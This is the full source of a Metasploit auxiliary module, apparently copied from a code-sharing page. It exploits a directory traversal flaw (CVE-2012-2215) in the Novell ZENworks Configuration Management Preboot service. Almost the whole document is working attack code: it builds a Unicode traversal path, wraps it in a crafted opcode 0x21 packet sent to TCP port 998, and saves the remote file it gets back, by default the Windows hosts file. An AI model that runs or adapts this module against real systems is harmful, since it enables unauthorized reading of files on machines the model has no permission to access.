Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Report
9
  include Msf::Auxiliary::Scanner
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Novell ZENworks Configuration Management Preboot Service Remote File Access',
14
      'Description'    => %q{
15
          This module exploits a directory traversal in the ZENworks Configuration Management.
16
        The vulnerability exists in the Preboot service and can be triggered by sending a specially
17
        crafted PROXY_CMD_FTP_FILE (opcode 0x21) packet to the 998/TCP port. This module has been
18
        successfully tested on Novell ZENworks Configuration Management 10 SP2 and SP3 over Windows.
19
      },
20
      'License'        => MSF_LICENSE,
21
      'Author'         =>
22
        [
23
          'Luigi Auriemma', # Vulnerability Discovery
24
          'juan vazquez' # Metasploit module
25
        ],
26
      'References'     =>
27
        [
28
          [ 'CVE', '2012-2215' ],
29
          [ 'OSVDB', '80230' ],
30
          [ 'URL', 'https://web.archive.org/web/20121103122235/http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=975' ]
31
        ]
32
    ))
33

34
    register_options(
35
      [
36
        Opt::RPORT(998),
37
        OptString.new('FILEPATH', [true, 'The name of the file to download', '\\WINDOWS\\system32\\drivers\\etc\\hosts']),
38
        OptInt.new('DEPTH', [true, 'Traversal depth', 6])
39
      ])
40
  end
41

42
  def run_host(ip)
43
    # No point to continue if no filename is specified
44
    if datastore['FILEPATH'].nil? or datastore['FILEPATH'].empty?
45
      print_error("Please supply the name of the file you want to download")
46
      return
47
    end
48

49
    travs = "\\.." * datastore['DEPTH']
50
    travs << "\\" unless datastore['FILEPATH'][0] == "\\"
51
    travs << datastore['FILEPATH']
52

53
    payload = Rex::Text.to_unicode(travs)
54
    packet =  [0x21].pack("N") # Opcode
55
    packet << [payload.length].pack("N") # Length
56
    packet << payload # Value
57

58
    connect
59
    sock.put(packet)
60
    sock.get_once(4, 1)
61
    length = sock.get_once(4, 1)
62

63
    unless length
64
      print_error("Unable to get length due to a timeout")
65
      return
66
    end
67

68
    sock.get_once(0x210-8, 1)
69
    contents = sock.get_once(length.unpack("V").first, 1)
70

71
    unless contents
72
      print_error("Unable to extract contents due to a timeout")
73
      return
74
    end
75

76
    disconnect
77

78
    print_good "File retrieved successfully!"
79
    fname = File.basename(datastore['FILEPATH'])
80
    path = store_loot(
81
      'novell.zenworks_configuration_management',
82
      'application/octet-stream',
83
      ip,
84
      contents,
85
      fname
86
    )
87
    print_status("File saved in: #{path}")
88
  end
89
end
90

91